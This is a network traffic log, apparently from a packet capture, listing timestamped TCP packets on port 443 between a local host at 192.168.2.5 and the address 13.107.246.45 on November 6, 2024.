                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.986614943 CET49744443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.986644030 CET4434974413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.987107038 CET49744443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.987112999 CET4434974413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.990984917 CET4434974313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.991324902 CET49743443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.991348982 CET4434974313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.991733074 CET49743443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.991738081 CET4434974313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.063548088 CET4434974113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.063690901 CET4434974113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.063760996 CET49741443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.063987017 CET49741443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.064004898 CET4434974113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.064014912 CET49741443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.064022064 CET4434974113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.067028999 CET49745443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.067085028 CET4434974513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.067205906 CET49745443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.067352057 CET49745443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.067361116 CET4434974513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.105546951 CET4434974213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.105603933 CET4434974213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.105715036 CET49742443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.112926960 CET4434974013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.113013029 CET4434974013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.113066912 CET49740443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.118738890 CET4434974413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.119323969 CET4434974413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.119380951 CET49744443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.123547077 CET4434974313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.123759031 CET4434974313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.123859882 CET49743443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.124386072 CET49742443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.124403954 CET4434974213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.124414921 CET49742443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.124420881 CET4434974213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.125140905 CET49743443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.125148058 CET4434974313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.125159979 CET49743443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.125164032 CET4434974313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.128072977 CET49740443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.128078938 CET4434974013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.128093958 CET49740443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.128097057 CET4434974013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.130820036 CET49744443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.130836964 CET4434974413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.130853891 CET49744443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.130858898 CET4434974413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.133663893 CET49746443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.133686066 CET4434974613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.133744955 CET49746443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.134874105 CET49747443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.134897947 CET4434974713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.135001898 CET49747443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.135262966 CET49746443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.135281086 CET4434974613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.135720968 CET49748443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.135740042 CET4434974813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.135787010 CET49748443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.135844946 CET49747443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.135858059 CET4434974713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.135927916 CET49748443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.135938883 CET4434974813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.136450052 CET49749443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.136466980 CET4434974913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.136527061 CET49749443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.136615038 CET49749443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.136629105 CET4434974913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.793431044 CET4434974513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.840698004 CET49745443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.852130890 CET49745443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.852154970 CET4434974513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.852730036 CET49745443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.852736950 CET4434974513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.853334904 CET4434974613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.853887081 CET49746443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.853909969 CET4434974613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.854516029 CET49746443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.854521990 CET4434974613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.859782934 CET4434974913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.862189054 CET4434974813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.863467932 CET49749443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.863492966 CET4434974913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.864207029 CET49749443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.864212990 CET4434974913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.866060972 CET4434974713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.866743088 CET49747443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.866775990 CET4434974713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.867758989 CET49747443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.867764950 CET4434974713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.885435104 CET49748443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.885461092 CET4434974813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.886385918 CET49748443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.886390924 CET4434974813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.978274107 CET4434974513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.978389978 CET4434974513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.978574038 CET49745443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.980757952 CET4434974613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.980983973 CET4434974613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.981120110 CET49746443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.987463951 CET4434974913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.987546921 CET4434974913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.987632036 CET49749443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.994530916 CET4434974713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.994703054 CET4434974713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:25.994751930 CET49747443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:26.012970924 CET4434974813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:26.013199091 CET4434974813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:26.013864040 CET49748443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:26.072817087 CET49745443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:26.072851896 CET4434974513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:26.073025942 CET49745443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:26.073035002 CET4434974513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:26.073064089 CET49747443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:26.073064089 CET49747443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:26.073071003 CET4434974713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:26.073075056 CET4434974713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:26.073204041 CET49748443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:26.073204041 CET49748443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:26.073318005 CET4434974813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:26.073331118 CET4434974813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:26.074590921 CET49746443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:26.074630022 CET4434974613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:26.074647903 CET49746443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:26.074660063 CET4434974613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:26.096287966 CET49749443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:26.096313000 CET4434974913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:26.096327066 CET49749443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:26.096333027 CET4434974913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:26.102051973 CET49750443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:26.102082014 CET4434975013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:26.102147102 CET49750443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:26.238990068 CET49751443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:26.239044905 CET4434975113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:26.239219904 CET49751443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:26.242934942 CET49752443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:26.242981911 CET4434975213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:26.243104935 CET49752443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:26.251439095 CET49750443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:26.251477957 CET4434975013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:26.314367056 CET49751443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:26.314399958 CET4434975113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:26.314534903 CET49752443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:26.314559937 CET4434975213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:26.424057007 CET49753443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:26.424115896 CET4434975313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:26.424181938 CET49753443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:26.428565979 CET49754443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:26.428612947 CET4434975413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:26.428683043 CET49754443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:26.446577072 CET49753443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:26.446600914 CET4434975313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:26.447541952 CET49754443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:26.447560072 CET4434975413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.241919994 CET4434975013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.245251894 CET49750443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.245280027 CET4434975013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.245803118 CET49750443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.245810032 CET4434975013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.368108988 CET4434975413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.369209051 CET49754443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.369237900 CET4434975413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.370002985 CET49754443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.370007992 CET4434975413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.370913029 CET4434975213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.371115923 CET4434975313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.371407986 CET49752443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.371417046 CET4434975213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.371841908 CET4434975113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.371897936 CET49752443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.371901989 CET4434975213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.372885942 CET49753443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.372932911 CET4434975313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.373390913 CET49753443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.373399019 CET4434975313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.373919010 CET49751443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.373941898 CET4434975113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.374564886 CET49751443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.374568939 CET4434975113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.412427902 CET4434975013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.412507057 CET4434975013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.412571907 CET49750443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.416424036 CET49750443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.416440964 CET4434975013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.416467905 CET49750443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.416475058 CET4434975013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.420334101 CET49762443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.420368910 CET4434976213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.420433044 CET49762443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.420591116 CET49762443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.420605898 CET4434976213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.496334076 CET4434975413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.496398926 CET4434975413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.496452093 CET49754443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.496762991 CET49754443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.496778965 CET4434975413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.496788025 CET49754443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.496793985 CET4434975413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.500978947 CET49763443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.501028061 CET4434976313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.501070976 CET4434975213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.501089096 CET49763443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.501477003 CET49763443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.501493931 CET4434976313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.501554012 CET4434975213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.501595020 CET49752443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.501605988 CET4434975313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.501837969 CET49752443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.501842022 CET4434975213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.501852036 CET49752443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.501854897 CET4434975213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.501874924 CET4434975313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.501921892 CET49753443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.501966953 CET49753443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.501966953 CET49753443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.501985073 CET4434975313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.501995087 CET4434975313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.502938032 CET4434975113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.503429890 CET4434975113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.503490925 CET49751443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.503525019 CET49751443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.503539085 CET4434975113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.512481928 CET49764443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.512501955 CET4434976413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.512558937 CET49764443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.513834953 CET49765443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.513859034 CET4434976513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.513911963 CET49765443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.514101028 CET49765443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.514111996 CET4434976513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.514355898 CET49764443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.514369011 CET4434976413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.515559912 CET49766443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.515567064 CET4434976613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.515616894 CET49766443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.515758991 CET49766443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:27.515770912 CET4434976613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:28.155962944 CET4434976213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:28.157026052 CET49762443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:28.157026052 CET49762443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:28.157059908 CET4434976213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:28.157088041 CET4434976213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:28.239120007 CET4434976313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:28.240216970 CET49763443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:28.240231991 CET4434976313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:28.241933107 CET49763443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:28.241936922 CET4434976313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:28.291348934 CET4434976213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:28.291416883 CET4434976213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:28.291774035 CET49762443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:28.291774035 CET49762443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:28.291815042 CET49762443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:28.291834116 CET4434976213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:28.295733929 CET49768443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:28.295766115 CET4434976813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:28.296078920 CET49768443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:28.296150923 CET49768443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:28.296165943 CET4434976813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:28.368545055 CET4434976313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:28.368604898 CET4434976313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:28.368781090 CET49763443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:28.368977070 CET49763443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:28.368977070 CET49763443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:28.369004011 CET4434976313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:28.369015932 CET4434976313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:28.372668028 CET49769443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:28.372715950 CET4434976913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:28.373039961 CET49769443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:28.373284101 CET49769443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:28.373302937 CET4434976913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:28.482506990 CET4434976513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:28.483858109 CET49765443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:28.483858109 CET49765443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:28.483891010 CET4434976513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:28.483916044 CET4434976513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:28.489609957 CET4434976413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:28.494368076 CET49764443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:28.494398117 CET4434976413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:28.495980978 CET49764443192.168.2.513.107.246.45
